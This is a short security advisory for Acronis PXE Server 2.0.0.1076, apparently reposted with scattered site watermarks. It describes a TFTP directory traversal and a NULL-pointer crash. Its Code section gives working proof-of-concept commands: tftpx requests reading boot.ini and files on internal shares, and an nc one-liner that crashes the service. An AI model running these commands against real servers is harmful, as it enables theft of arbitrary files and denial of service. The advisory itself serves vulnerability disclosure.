Acronis PXE Server 2.0.0.1076 Directory Traversal - NULL Pointer Vulns

#################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#################################################################

===============
1) Introduction
=============== 网管u家u.bitscn@com

The Acronis PXE Server is an essential component of Acronis Snap Deploy
Server, a deployment solution for automatically configuring all the
clients of the local network.

网管u家bitscn.net

#################################################################

网管联盟bitsCN_com

=======
2) Bugs
=======

----------------------
A] directory traversal
---------------------- 网管网www.bitscn.com

The PXE Server (pxesrv.exe) implements a TFTP server for allowing the
downloading of the bootstrap files (uploading is not allowed).
This service is vulnerable to a classical directory traversal and an
arbitrary path attacks which allow an attacker to download any file
from the local disks or the network shares.

---------------
B] NULL pointer
--------------- 中国网管论坛bbs.bitsCN.com

An incomplete TFTP request (anything which goes from the simple absence
of the option field to the usage of only the 2 bytes for the opcode)
causes the crashing of the PXE Server due to a NULL pointer access. 网管u家bitscn.net

################################################################# 网管联盟bitsCN@com

===========
3) The Code
===========

网管朋友网www_bitscn_net

A]
http://aluigi.org/testz/tftpx.zip 网管有家bitscn.net

  tftpx SERVER ..\../..\../boot.ini none
  tftpx SERVER c:\boot.ini none
  tftpx SERVER \\internal_host\documents\file.txt none 网管网www_bitscn_com

B]
send the bytes 00 01 to UDP port 69 of the server: 网管网www.bitscn.com

  echo -n -e \x00\x01|nc SERVER 69 -v -v -u 网管朋友网www_bitscn_net

  中国网管论坛bbs.bitsCN.com

################################################################

======
4) Fix
====== 网管u家u.bitsCN.com

No fix 网管网www_bitscn_com

#################################################################
网管bitscn_com